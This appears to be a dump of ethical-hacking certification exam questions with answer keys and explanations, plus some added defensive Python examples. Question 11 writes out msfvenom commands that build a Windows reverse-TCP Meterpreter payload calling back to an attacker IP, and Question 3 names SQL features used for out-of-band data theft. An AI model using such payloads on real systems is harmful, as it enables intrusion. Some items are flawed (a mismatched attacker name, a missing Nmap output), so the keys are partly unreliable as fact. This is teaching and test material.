
Exam A

QUESTION 1
Susan, a software developer, wants her web API to update other applications with the latest information. For
this purpose, she uses user-defined HTTP callback or push APIs that are raised based on trigger events:
when invoked, this feature supplies data to other applications so that users can instantly receive real-time
information.
Which of the following techniques is employed by Susan?

A. web shells
B. Webhooks
C. REST API
D. SOAP API

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Webhooks are one of a few ways internet applications communicate with one another.
They allow you to send real-time data from one application to another whenever a given event happens.
For example, let's say you've created an application using the Foursquare API that tracks when people check into
your restaurant. You ideally wish to be able to greet customers by name and provide a complimentary drink when
they check in.
What a webhook does is notify you any time someone checks in, so you'd be able to run any processes that you
had in your application once this event is triggered. The data is sent over the web from the application where
the event originally occurred to the receiving application that handles the data.
Here's a visual representation of what that looks like:
A webhook URL is provided by the receiving application and acts as a phone number that the other application
calls once an event happens. Only it's more complicated than a phone number, because data about the event is
shipped to the webhook URL in either JSON or XML format; this is known as the "payload." Here's an example of
what a webhook URL looks like with the payload it's carrying:

What are Webhooks? Webhooks are user-defined HTTP callback or push APIs that are raised based on events
triggered, such as a comment received on a post or pushing code to a registry. A webhook allows an application
to update other applications with the latest information. Once invoked, it supplies data to the other applications,
which means that users instantly receive real-time information. Webhooks are sometimes called "Reverse APIs"
as they provide what is required for an API specification, and the developer should create an API to use a
webhook. A webhook is an API concept that is also used to send text messages and notifications to mobile
numbers or email addresses from an application when a specific event is triggered. For instance, if you search for
something in an online store and the required item is out of stock, you click on the "Notify me" bar to get an alert
from the application when that item is available for purchase.
These notifications from the applications are usually sent through webhooks.
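The flow described above, as an added example that is not part of the original answer: the receiving application exposes a webhook URL, the sending application POSTs a JSON payload to it when a check-in event fires, and the receiver runs its own logic on the payload. The path /hooks/checkin, the X-Hook-Signature header and the shared secret are constructed for the demo; the HMAC signature check is a common hardening the question does not mention, but without it anyone who learns the URL can post fake events.

```python
import hashlib
import hmac
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed values for the demo: a shared secret agreed out of band, and the
# (hypothetical) header name that carries the payload signature.
WEBHOOK_SECRET = b"example-shared-secret"
SIGNATURE_HEADER = "X-Hook-Signature"
HOOK_PATH = "/hooks/checkin"

received_events = []  # greetings produced by the receiving application


def sign_payload(body: bytes, secret: bytes = WEBHOOK_SECRET) -> str:
    """HMAC-SHA256 over the raw body, attached by the sender so the receiver can
    distinguish a genuine delivery from an arbitrary POST to its public URL."""
    return hmac.new(secret, body, hashlib.sha256).hexdigest()


def verify_and_parse(body: bytes, signature, secret: bytes = WEBHOOK_SECRET):
    """Return the decoded JSON payload if the signature matches, else None."""
    expected = sign_payload(body, secret)
    # compare_digest avoids leaking the position of a mismatch through timing.
    if not hmac.compare_digest(expected, signature or ""):
        return None
    try:
        return json.loads(body)
    except ValueError:
        return None


def handle_event(payload: dict) -> str:
    """The receiver's own logic: react to the trigger event named in the payload."""
    if payload.get("event") == "checkin":
        return f"Welcome back, {payload.get('user', 'guest')}! Your drink is on us."
    return f"ignored event {payload.get('event')!r}"


class WebhookReceiver(BaseHTTPRequestHandler):
    """The receiving application: owns the webhook URL and handles deliveries."""

    def do_POST(self):
        if self.path != HOOK_PATH:
            self.send_error(404)
            return
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        payload = verify_and_parse(body, self.headers.get(SIGNATURE_HEADER))
        if payload is None:
            self.send_error(401, "bad signature or malformed JSON")
            return
        received_events.append(handle_event(payload))
        self.send_response(204)  # accepted, nothing to return
        self.end_headers()

    def log_message(self, *args):  # silence per-request logging in the demo
        pass


def start_receiver() -> HTTPServer:
    """Bind an ephemeral loopback port and serve in a background thread."""
    server = HTTPServer(("127.0.0.1", 0), WebhookReceiver)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def deliver(url: str, payload: dict, secret: bytes = WEBHOOK_SECRET) -> int:
    """The sending application: POST the JSON payload with its signature; return the HTTP status."""
    body = json.dumps(payload).encode()
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/json",
                 SIGNATURE_HEADER: sign_payload(body, secret)},
    )
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def demo() -> list:
    """One genuine check-in delivery and one forged one; returns both statuses and the accepted events."""
    received_events.clear()
    server = start_receiver()
    url = f"http://127.0.0.1:{server.server_port}{HOOK_PATH}"
    genuine = deliver(url, {"event": "checkin", "user": "Susan"})
    forged = deliver(url, {"event": "checkin", "user": "Mallory"}, secret=b"wrong-secret")
    server.shutdown()
    server.server_close()
    return [genuine, forged, list(received_events)]


if __name__ == "__main__":
    print(demo())  # [204, 401, ['Welcome back, Susan! Your drink is on us.']]
```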

QUESTION 2
Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He
found the contact number of sibertech.org and dialed the number, claiming to represent a technical support team
from a vendor. He warned that a specific server was about to be compromised and requested sibertech.org to
follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install
malicious files, which were then used to collect and pass critical information to Johnson's machine. What is the
social engineering technique Steve employed in the above scenario?

A. Quid pro quo
B. Diversion theft
C. Elicitation
D. Phishing

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Explanation:
https://www.eccouncil.org/what-is-social-engineering/
This social engineering scam involves an exchange of information that can benefit both the victim and the
trickster. Scammers make the prey believe that a fair exchange will take place between both sides, but in reality
only the fraudster stands to benefit, leaving the victim hanging on to nothing. An example of a quid pro quo is a
scammer pretending to be an IT support technician. The con artist asks for the login credentials of the
company's computer, saying that the company is going to receive technical support in return. Once the victim
has provided the credentials, the scammer has control over the company's computer and may load malware or
steal personal information that can be a motive to commit identity theft.
"A quid pro quo attack (aka 'something for something' attack) is a variant of baiting. Instead of baiting a target
with the promise of a good, a quid pro quo attack promises a service or a benefit based on the execution of a
specific action."
https://resources.infosecinstitute.com/topic/common-social-engineering-attacks/#:~:text=A%20quid%20pro%20quo%20attack,execution%20of%20a%20specific%20action.

QUESTION 3
SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication
and allow attackers to access and/or modify data attached to a web application. Which of the following SQLi
types leverages a database server's ability to make DNS requests to pass data to an attacker?

A. Union-based SQLi
B. Out-of-band SQLi
C. In-band SQLi
D. Time-based blind SQLi

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and
gather results. Out-of-band SQLi techniques rely on the database server's ability to make DNS or HTTP requests
to deliver data to an attacker. Out-of-band SQL injection is not very common, mostly because it depends on
features being enabled on the database server used by the web application.
Out-of-band techniques offer an attacker an alternative to inferential time-based techniques, especially if the
server responses are not very stable (making an inferential time-based attack unreliable). Such is the case with
Microsoft SQL Server's xp_dirtree command, which can be used to make DNS requests to a server an attacker
controls, as well as Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL
and PL/SQL to a server an attacker controls.

QUESTION 4
Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a
restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques
must he use to perform the given task?

A. UDP scan
B. TCP Maimon scan
C. arp ping scan
D. ACK flag probe scan

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
One of the most common Nmap usage scenarios is scanning an Ethernet LAN. Most LANs, especially those
that use the private address ranges granted by RFC 1918, do not use the overwhelming majority of their IP
addresses. When Nmap attempts to send a raw IP packet, such as an ICMP echo request, the OS must
determine the destination hardware (ARP) address for the target IP so that the Ethernet frame can be properly
addressed. This requires it to issue a series of ARP requests.
This is best illustrated by an example where a ping scan is attempted against a local Ethernet host. The
--send-ip option tells Nmap to send IP-level packets (rather than raw Ethernet), even on local networks. The
Wireshark output of the three ARP requests and their timing has been pasted into the session.
Example a: Raw IP ping scan for offline targets
This example took quite a couple of seconds to finish because the (Linux) OS sent three ARP requests at 1
second intervals before abandoning the host. Waiting several seconds is excessive, as the ARP response
usually arrives within a few milliseconds. Reducing this timeout period is not a priority for OS vendors, as the
overwhelming majority of packets are sent to hosts that actually exist. Nmap, on the other hand, needs to send
packets to 16 million IPs given a target like 10.0.0.0/8. Many targets are pinged in parallel, but waiting 2
seconds for each is a serious delay.
There is another problem with raw IP ping scans on the LAN. If the destination host turns out to be
unresponsive, as in the previous example, the source host usually adds an incomplete entry for that destination
IP to the kernel ARP table. ARP table space is finite and some operating systems become unresponsive when
it is full. If Nmap is used in raw IP mode (--send-ip), it may have to wait a few minutes for the ARP cache
entries to expire before continuing host discovery.
ARP scans solve both problems by putting Nmap in control. Nmap issues raw ARP requests and handles
retransmissions and timeout periods at its sole discretion. The system ARP cache is bypassed. The example
shows the difference: this ARP scan takes just over a tenth of the time of the equivalent IP scan.
Example b: ARP ping scan of offline target
In example b, neither the -PR option nor the --send-eth option has any effect. This is because ARP is the
default scan type when scanning Ethernet hosts that Nmap discovers are on a local Ethernet network. This
includes traditional wired Ethernet as well as 802.11 wireless networks. As mentioned above, ARP scanning is
not only more efficient, but also more accurate. Hosts frequently block IP-based ping packets, but usually
cannot block ARP requests or responses and still communicate over the network. Nmap uses ARP for all
targets on the local LAN, even if different ping types (such as -PE and -PS) are specified. If you do not want
Nmap to attempt an ARP scan at all, specify --send-ip as shown in Example a, "Raw IP Ping Scan for Offline
Targets".
If you give Nmap control to send raw Ethernet frames, Nmap can also adjust the source MAC address. If you
have the only PowerBook in your security conference room and a large ARP scan is initiated from an Apple-
registered MAC address, heads may turn to you. Use the --spoof-mac option to spoof the MAC address as
described in the MAC Address Spoofing section.
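As an added example (not from the Nmap documentation quoted above): since hosts cannot block ARP requests, an ARP ping sweep is visible to anyone capturing on the same segment. The Python below parses constructed tcpdump-style ARP lines and flags a sender that asks for many distinct IPs within a short window; the sample capture, the 2-second window and the 10-target threshold are all constructed values, not Nmap or tcpdump defaults.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed tcpdump-style capture (no -e, so no MAC addresses shown). One host,
# 10.0.0.50, asks for twelve neighbours within a few milliseconds, which is what an
# Nmap ARP ping sweep of a small range looks like on the wire; the other lines are
# ordinary ARP traffic, and the late repeat for 10.0.0.3 is a retransmission.
SAMPLE_CAPTURE = """\
09:15:00.500000 ARP, Request who-has 10.0.0.50 tell 10.0.0.1, length 28
09:15:01.000100 ARP, Request who-has 10.0.0.1 tell 10.0.0.50, length 28
09:15:01.000300 ARP, Request who-has 10.0.0.2 tell 10.0.0.50, length 28
09:15:01.000500 ARP, Request who-has 10.0.0.3 tell 10.0.0.50, length 28
09:15:01.000700 ARP, Request who-has 10.0.0.4 tell 10.0.0.50, length 28
09:15:01.000900 ARP, Request who-has 10.0.0.5 tell 10.0.0.50, length 28
09:15:01.001100 ARP, Request who-has 10.0.0.6 tell 10.0.0.50, length 28
09:15:01.001300 ARP, Request who-has 10.0.0.7 tell 10.0.0.50, length 28
09:15:01.001500 ARP, Request who-has 10.0.0.8 tell 10.0.0.50, length 28
09:15:01.001700 ARP, Request who-has 10.0.0.9 tell 10.0.0.50, length 28
09:15:01.001900 ARP, Request who-has 10.0.0.10 tell 10.0.0.50, length 28
09:15:01.002100 ARP, Request who-has 10.0.0.11 tell 10.0.0.50, length 28
09:15:01.002300 ARP, Request who-has 10.0.0.12 tell 10.0.0.50, length 28
09:15:01.300000 ARP, Request who-has 10.0.0.1 tell 10.0.0.7, length 28
09:15:01.350000 ARP, Reply 10.0.0.1 is-at 00:11:22:33:44:55, length 28
09:15:02.003000 ARP, Request who-has 10.0.0.3 tell 10.0.0.50, length 28
"""

ARP_REQUEST = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d{1,6}) ARP, Request who-has "
    r"(?P<target>\d{1,3}(?:\.\d{1,3}){3}) tell (?P<sender>\d{1,3}(?:\.\d{1,3}){3})"
)


def parse_arp_requests(capture: str) -> list:
    """Extract (timestamp, sender, target) from ARP Request lines; replies are ignored."""
    events = []
    for line in capture.splitlines():
        m = ARP_REQUEST.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%H:%M:%S.%f")
            events.append((ts, m["sender"], m["target"]))
    return events


def detect_arp_sweeps(events, window=timedelta(seconds=2), min_targets=10):
    """Per sender, find the largest number of *distinct* targets requested within any
    `window`; senders at or above `min_targets` are flagged. Counting distinct targets
    means OS retransmissions to one host (three per miss, as the text notes) do not
    inflate the score, while a sweep across many hosts does."""
    by_sender = defaultdict(list)
    for ts, sender, target in events:
        by_sender[sender].append((ts, target))
    peak = {}
    for sender, reqs in by_sender.items():
        reqs.sort()
        best, start = 0, 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1  # slide the window forward
            best = max(best, len({t for _, t in reqs[start:end + 1]}))
        peak[sender] = best
    flagged = sorted(s for s, n in peak.items() if n >= min_targets)
    return peak, flagged


if __name__ == "__main__":
    peak, flagged = detect_arp_sweeps(parse_arp_requests(SAMPLE_CAPTURE))
    for sender in sorted(peak):
        mark = "  <-- ARP sweep" if sender in flagged else ""
        print(f"{sender:<12} distinct targets in window: {peak[sender]:>3}{mark}")
```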

QUESTION 5
Ralph, a professional hacker, targeted Jane, who had recently bought new systems for her company.
After a few days, Ralph contacted Jane while masquerading as a legitimate customer support executive,
informing her that her systems needed to be serviced for proper functioning and that customer support would
send a computer technician. Jane promptly replied positively. Ralph entered Jane's company using this
opportunity and gathered sensitive information by scanning terminals for passwords, searching for important
documents in desks, and rummaging through bins. What is the type of attack technique Ralph used on Jane?

A. Dumpster diving
B. Eavesdropping
C. Shoulder surfing
D. Impersonation

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:

QUESTION 6
Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the target's MSP by
sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain
remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account,
compressed the customer data, and stored it in the MSP. Then, she used this information to launch further
attacks on the target organization. Which of the following cloud attacks did Alice perform in the above
scenario?

A. Cloud hopper attack
B. Cloud cryptojacking
C. Cloudborne attack
D. Man-in-the-cloud (MITC) attack

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Operation Cloud Hopper was an in-depth attack and theft of data in 2017 directed at MSPs in the United
Kingdom (U.K.), United States (U.S.), Japan, Canada, Brazil, France, Switzerland, Norway, Finland, Sweden,
South Africa, India, Thailand, South Korea and Australia. The group used MSPs as intermediaries to acquire
assets and trade secrets from MSP clients in engineering, industrial manufacturing, retail, energy,
pharmaceuticals, telecommunications, and government agencies. Operation Cloud Hopper used over 70
variants of backdoors, malware and trojans. These were delivered through spear-phishing emails. The attackers
used scheduled tasks or leveraged services/utilities to persist on Microsoft Windows systems even if the system
was rebooted. They installed malware and hacking tools to access systems and steal data.

QUESTION 7
Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the
organization. To implement this service, he reached out to a telecom company to provide Internet connectivity
and transport services between the organization and the cloud service provider. In the NIST cloud deployment
reference architecture, under which category does the telecom company fall in the above scenario?

A. Cloud broker
B. Cloud consumer
C. Cloud carrier
D. Cloud auditor

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
A cloud carrier acts as an intermediary that provides connectivity and transport of cloud services between cloud
consumers and cloud providers. Cloud carriers provide access to consumers through network,
telecommunication and other access devices. For instance, cloud consumers can obtain cloud services through
network access devices such as computers, laptops, mobile phones, mobile Internet devices (MIDs), etc.
The distribution of cloud services is often provided by network and telecommunication carriers or a transport
agent, where a transport agent refers to a business organization that provides physical transport of storage
media such as high-capacity hard drives.
Note that a cloud provider can set up SLAs with a cloud carrier to provide services consistent with the level of
SLAs offered to cloud consumers, and may require the cloud carrier to provide dedicated and secure
connections between cloud consumers and cloud providers.

QUESTION 8
Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and
location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her
acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers
information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?

A. ophcrack
B. Hootsuite
C. VisualRoute
D. HULK

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Hootsuite is a social media management platform that covers virtually every aspect of a social media manager's
role. With only one platform users are able to do the easy stuff, like curating content and scheduling posts on
social media, all the way up to managing team members and measuring ROI. There are many different plans
to choose from, from a single-user set-up up to a bespoke enterprise account that's appropriate for much larger
organizations.
Conducting location search on social media sites such as Twitter, Instagram, and Facebook helps attackers
detect the geolocation of the target. This information further helps attackers perform various social engineering
and non-technical attacks. Many online tools such as Followerwonk, Hootsuite, and Sysomos are available to
search for both geotagged and non-geotagged information on social media sites. Attackers search social media
sites using these online tools by keywords, usernames, date, time, and so on.

QUESTION 9
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application
she is working on. She utilizes a component that can process API requests and handle various Docker objects,
such as containers, volumes, images, and networks. What is the component of the Docker architecture used by
Annie in the above scenario?

A. Docker client
B. Docker objects
C. Docker daemon
D. Docker registries

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Docker uses a client-server architecture. The Docker client talks to the Docker daemon, which does the work of
building, running, and distributing your Docker containers. The Docker client and daemon can run on the same
system, or you can connect a Docker client to a remote Docker daemon. The Docker client and daemon
communicate using a REST API, over UNIX sockets or a network interface.
The Docker daemon (dockerd) listens for Docker API requests and manages Docker objects such as images,
containers, networks, and volumes. A daemon can also communicate with other daemons to manage Docker
services.

QUESTION 10
Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After
establishing the connection with the public computer, Steven enabled iTunes Wi-Fi sync on the computer so
that the device could continue communication with that computer even after being physically disconnected.
Now, Clark gains access to Steven's iPhone through the infected computer and is able to monitor and read all of
Steven's activity on the iPhone, even after the device is out of the communication zone.
Which of the following attacks is performed by Clark in the above scenario?

A. iOS trustjacking
B. iOS jailbreaking
C. Exploiting SS7 vulnerability
D. Man-in-the-disk attack

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Explanation:
An iPhone user's worst nightmare is to have someone take over his/her device, including the ability to record
and control all activity without needing to be in the same room. In this blog post, we present a new vulnerability
called "Trustjacking", which allows an attacker to do exactly that.
This vulnerability exploits an iOS feature called iTunes Wi-Fi sync, which allows a user to manage their iOS
device without physically connecting it to their computer. A single tap by the iOS device owner when the two are
connected to the same network allows an attacker to gain control over the device. In addition, we will walk
through past related vulnerabilities and show the changes that Apple has made to mitigate them, and why these
are not enough to prevent similar attacks.
After connecting an iOS device to a new computer, the user is asked whether they trust the connected computer
or not. Choosing to trust the computer allows it to communicate with the iOS device via the standard iTunes
APIs. This allows the computer to access the photos on the device, perform backups, install applications and
much more, without requiring another confirmation from the user and with no noticeable indication. Furthermore,
this allows activating the "iTunes Wi-Fi sync" feature, which makes it possible to continue this kind of
communication with the device even after it has been disconnected from the computer, as long as the computer
and the iOS device are connected to the same network. It is interesting to note that enabling "iTunes Wi-Fi
sync" does not require the victim's approval and can be conducted purely from the computer side.
Getting a live stream of the device's screen can be done easily by continuously requesting screenshots and
displaying or recording them remotely.
It is important to note that other than the initial single point of failure, authorizing the malicious computer, there
is no other mechanism that prevents this continued access. In addition, there is nothing that notifies the users
that by authorizing the computer they allow access to their device even after disconnecting the USB cable.

QUESTION 11
What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module.
Multiple payloads can be created with this module and it helps provide something that can give you a shell in
almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler.
Run `set payload` for the relevant payload used and configure all necessary options (LHOST, LPORT, etc).
Execute and wait for the payload to be run. For the examples below it's pretty self explanatory, but LHOST
should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the
internet), and LPORT should be the port you wish to be connected back on.
Example for Windows:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect
On> -f exe > shell.exe

QUESTION 12
Which of the following information security controls creates an appealing isolated environment for hackers to
prevent them from compromising critical targets while simultaneously gathering information about the hacker?

A. Intrusion detection system
B. Honeypot
C. Botnet
D. Firewall

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
A honeypot is a trap that an IT pro lays for a malicious hacker, hoping that they will interact with it in a way that
gives useful intelligence. It's one of the oldest security measures in IT, but beware: luring hackers onto your
network, even on an isolated system, can be a dangerous game.
"A honeypot is a computer or computing system intended to mimic likely targets of cyberattacks." Often a
honeypot is going to be deliberately configured with known vulnerabilities in place to make a more tempting or
obvious target for attackers. A honeypot won't contain production data or participate in legitimate traffic on
your network; that's how you'll tell that anything happening within it is the result of an attack. If someone's
stopping by, they're up to no good.
That definition covers a diverse array of systems, from bare-bones virtual machines that only offer a couple of
vulnerable systems to ornately constructed fake networks spanning multiple servers. And the goals of those who
build honeypots can vary widely as well, ranging from defense in depth to academic research. In addition,
there's now an entire marketing category of deception technology that, while not meeting the strict definition of
a honeypot, is certainly within the same family. But we'll get to that in a moment.
Research honeypots aim to permit close analysis of how hackers do their dirty work. The team controlling the
honeypot can watch the techniques hackers use to infiltrate systems, escalate privileges, and otherwise run
amok through target networks. These sorts of honeypots are set up by security companies, academics, and
government agencies looking to examine the threat landscape. Their creators may be interested in learning what
kind of attacks are out there, getting details on how specific sorts of attacks work, or even trying to lure a
specific hacker in the hopes of tracing the attack back to its source. These systems are often built in fully
isolated lab environments, which ensures that any breaches don't result in non-honeypot machines falling prey
to attacks.
Production honeypots, on the other hand, are usually deployed in proximity to some organization's production
infrastructure, though measures are taken to isolate them as much as possible. These honeypots often serve
both as bait to distract hackers who may be trying to break into that organization's network, keeping them far
away from valuable data or services, and as a canary in the coal mine, indicating that attacks are underway and
are at least partially succeeding.
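As an added illustration (example code written for this page, not from the article quoted above), a minimal low-interaction honeypot in Python: it serves a constructed FTP-style banner, never lets a login succeed, and records every connection as an alert, which is exactly the property the text relies on (the system carries no legitimate traffic, so any activity is an attack). The loopback address, the ephemeral port, the banner and the probe payloads are all constructed for the demo.

```python
import socket
import threading
import time
from dataclasses import dataclass, field


def record_alert(peer, data: bytes) -> dict:
    """Normalise one touch into an alert. Since the honeypot carries no legitimate
    traffic every connection is suspicious; a credential probe is rated higher."""
    first_line = data.split(b"\r\n", 1)[0].decode("ascii", "replace")
    severity = "high" if first_line.upper().startswith(("USER ", "PASS ")) else "medium"
    return {"ts": time.time(), "src": f"{peer[0]}:{peer[1]}",
            "data": first_line, "severity": severity}


@dataclass
class Honeypot:
    """Low-interaction honeypot: looks like an FTP service, offers no real functionality."""
    banner: bytes = b"220 files.example.internal FTP server ready\r\n"  # constructed banner
    alerts: list = field(default_factory=list)

    def start(self) -> int:
        """Listen on an ephemeral loopback port in a background thread; return the port."""
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock.bind(("127.0.0.1", 0))
        self._sock.listen(5)
        threading.Thread(target=self._serve, daemon=True).start()
        return self._sock.getsockname()[1]

    def _serve(self):
        while True:
            try:
                conn, peer = self._sock.accept()
            except OSError:  # listening socket closed by stop()
                return
            threading.Thread(target=self._handle, args=(conn, peer), daemon=True).start()

    def _handle(self, conn, peer):
        with conn:
            conn.settimeout(2.0)
            conn.sendall(self.banner)
            try:
                data = conn.recv(1024)
            except OSError:  # timeout or reset: still an alert, just with no data
                data = b""
            self.alerts.append(record_alert(peer, data))
            conn.sendall(b"530 Login incorrect.\r\n")  # no credentials are ever accepted

    def stop(self):
        self._sock.close()


def probe(port: int, payload: bytes) -> bytes:
    """Simulated visitor (constructed for the demo): read the banner, send one command."""
    with socket.create_connection(("127.0.0.1", port), timeout=2) as s:
        banner = s.recv(1024)
        s.sendall(payload)
        s.recv(1024)  # wait for the refusal so the alert is recorded before we return
    return banner


def demo() -> list:
    """Two visitors touch the honeypot; return (first line, severity) of each alert."""
    hp = Honeypot()
    port = hp.start()
    probe(port, b"USER admin\r\n")
    probe(port, b"HELP\r\n")
    hp.stop()
    return [(a["data"], a["severity"]) for a in hp.alerts]


if __name__ == "__main__":
    print(demo())  # [('USER admin', 'high'), ('HELP', 'medium')]
```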

QUESTION 13
Consider the following Nmap output:
What command-line parameter could you use to determine the type and version number of the web server?

A. -sV
B. -Pn
C. -V
D. -sS

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Explanation:
C:\Users\moi>nmap -h | findstr " -sV"
  -sV: Probe open ports to determine service/version info

QUESTION 14
What are common files on a web server that can be misconfigured and provide useful information for a hacker,
such as verbose error messages?

A. httpd.conf
B. administration.config
C. idq.dll
D. php.ini

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
The php.ini file is a special file for PHP. It's where you declare changes to your PHP settings. The server is
already configured with standard settings for PHP, which your site will use by default.
Unless you would like to change one or more settings, there's no need to create or modify a php.ini file. If you'd
like to make any changes to settings, please do so through the MultiPHP INI Editor.
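As an added example (not part of the original answer), a php.ini fragment showing the settings that produce the verbose error messages the question refers to, beside their hardened values; the error_log path is a placeholder that must be adapted to the host.

```ini
; --- Weak: a development configuration left on a production server ---
display_errors = On            ; sends error text, including file paths and line numbers, to the client
display_startup_errors = On
html_errors = On
expose_php = On                ; adds an "X-Powered-By: PHP/x.y.z" header to every response
log_errors = Off               ; nothing is kept server-side, so operators never see what clients saw

; --- Hardened: same information, but only where the operator can read it ---
display_errors = Off           ; errors never reach the browser
display_startup_errors = Off
html_errors = Off
expose_php = Off
log_errors = On                ; keep the full detail for troubleshooting
error_log = /var/log/php/error.log   ; placeholder path; readable and writable by the PHP worker only
error_reporting = E_ALL        ; log everything; display_errors=Off keeps it out of responses
```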

QUESTION 15
Infecting a system with malware and using phishing to gain credentials to a system or web application are
examples of which phase of the ethical hacking methodology?

A. Reconnaissance
B. Maintaining access
C. Scanning
D. Gaining access

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
In this phase the hacker uses different techniques and tools to gain maximum data from the system. They are:
· Password cracking: Methods like brute force, dictionary attack, rule-based attack and rainbow tables are used.
Brute force is trying all combinations of the password. A dictionary attack is trying a list of meaningful words
until the password matches. A rainbow table takes the hash value of the password and compares it with
pre-computed hash values until a match is discovered.
· Password attacks: Passive attacks like wire sniffing and replay attacks. Active online attacks like Trojans,
keyloggers, hash injection and phishing. Offline attacks like pre-computed hash, distributed network and rainbow
tables. Non-electronic attacks like shoulder surfing, social engineering and dumpster diving.

QUESTION 16
Which type of virus can change its own code and then cipher itself multiple times as it replicates?

A. Stealth virus
B. Tunneling virus
C. Cavity virus
D. Encryption virus

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Explanation:
A stealth virus is a sort of virus malware that contains sophisticated means of avoiding detection by antivirus
software. After it manages to get into the now-infected machine, a stealth virus hides itself by continually
renaming and moving itself around the disk.
Like other viruses, a stealth virus can take hold of many parts of one's PC. When it takes control of the PC and
performs tasks, antivirus programs can detect it, but a stealth virus sees that coming and renames then copies
itself to a different drive or area on the disk before the antivirus software gets to it. Once moved and renamed, a
stealth virus will usually replace the detected 'infected' file with a clean file that doesn't trigger anti-virus
detection. It's a never-ending game of cat and mouse.
The intelligent architecture of this sort of virus just about guarantees it's impossible to completely rid oneself of
it once infected. One would need to completely wipe the PC and rebuild it from scratch to completely eradicate
the presence of a stealth virus. Using regularly-updated antivirus software can reduce risk, but, as we all know,
antivirus software is also caught in an endless cycle of finding new threats and protecting against them.
https://www.techslang.com/definition/what-is-a-stealth-virus/

QUESTION 17
You are a penetration tester working to test the user awareness of the employees of the client xyz.
You harvested two employees' emails from some public sources and are creating a client-side backdoor to
send it to the employees via email. Which stage of the cyber kill chain are you at?

A. Reconnaissance
B. Command and control
C. Weaponization
D. Exploitation

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Weaponization
The adversary analyzes the data collected in the previous stage to identify the vulnerabilities and techniques
that can exploit and gain unauthorized access to the target organization. Based on the vulnerabilities identified
during analysis, the adversary selects or creates a tailored deliverable malicious payload (remote-access
malware weapon) using an exploit and a backdoor to send it to the victim. An adversary may target specific
network devices, operating systems, endpoint devices, or even individuals within the organization to carry out
their attack. For example, the adversary may send a phishing email to an employee of the target organization,
which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor
on the system that allows remote access to the adversary. The following are the activities of the adversary:
o Identifying appropriate malware payload based on the analysis
o Creating a new malware payload or selecting, reusing, modifying the available malware payloads based on the
identified vulnerability
o Creating a phishing email campaign
o Leveraging exploit kits and botnets
https://en.wikipedia.org/wiki/Kill_chain
The Cyber Kill Chain consists of 7 steps: Reconnaissance, weaponization, delivery, exploitation, installation,
command and control, and finally, actions on objectives. Below you can find detailed information on each.
1. Reconnaissance: In this step, the attacker/intruder chooses their target. Then they conduct in-depth research
on this target to identify its vulnerabilities that can be exploited.
2. Weaponization: In this step, the intruder creates a malware weapon like a virus, worm, or such to exploit the
target's vulnerabilities. Depending on the target and the purpose of the attacker, this malware can exploit new,
undetected vulnerabilities (also known as the zero-day exploits) or focus on a combination of different
vulnerabilities.
3. Delivery: This step involves transmitting the weapon to the target. The intruder/attacker can employ different
USB drives, e-mail attachments, and websites for this purpose.
